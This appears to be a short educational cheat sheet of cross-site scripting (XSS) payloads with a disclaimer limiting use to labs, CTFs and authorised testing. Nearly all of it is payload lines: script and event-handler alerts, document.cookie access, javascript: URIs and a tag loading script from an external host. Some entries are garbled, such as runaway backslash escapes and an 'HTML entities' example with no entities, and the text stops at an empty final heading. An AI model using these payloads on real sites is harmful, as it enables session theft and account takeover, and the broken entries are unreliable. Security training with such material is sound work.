Crafting XSS (Cross-Site Scripting) payloads is a significant aspect of learning about web application security, particularly for educational and ethical hacking purposes. Here, some generic examples of XSS payloads. Remember, these should only be used in legal, ethical contexts, such as in a lab environment, CTF (Capture the Flag) competitions, or when you have explicit permission to test a system.

Basic Alert:

<script>alert('XSS')</script>

Document Cookie Access:

<script>alert(document.cookie)</script>

JavaScript Execution:

<img src=x onerror=alert('XSS')>

Using JavaScript URI:

javascript:alert('XSS')

Executing Code from External Source:

<script src="<http://example.com/xss.js>"></script>

HTML Injection:

<div onclick="alert('XSS')">Click me</div>

Event Handler:

<body onload=alert('XSS')>

Using SVG:

<svg/onload=alert('XSS')>

Embedding in Style Tags:

<style>@import 'javascript:alert("XSS")';</style>

Using Iframe:

<iframe src="javascript:alert('XSS')"></iframe>

Non-Alpha-Non-Digit XSS:

<script>\\\\\\\\x3Cscript>\\\\\\\\x61\\\\\\\\x6C\\\\\\\\x65\\\\\\\\x72\\\\\\\\x74(1)//\\\\\\\\x3C/script></script>

Using document.domain:

<script>alert(document.domain)</script>

Using HTML Entities:

<script>alert('XSS')</script>

Breaking out of HTML Attributes:

<input value="<script>alert('XSS')</script>">

Using eval():

<script>eval('al'+'ert(1)')</script>

Breaking out of URL Parameters: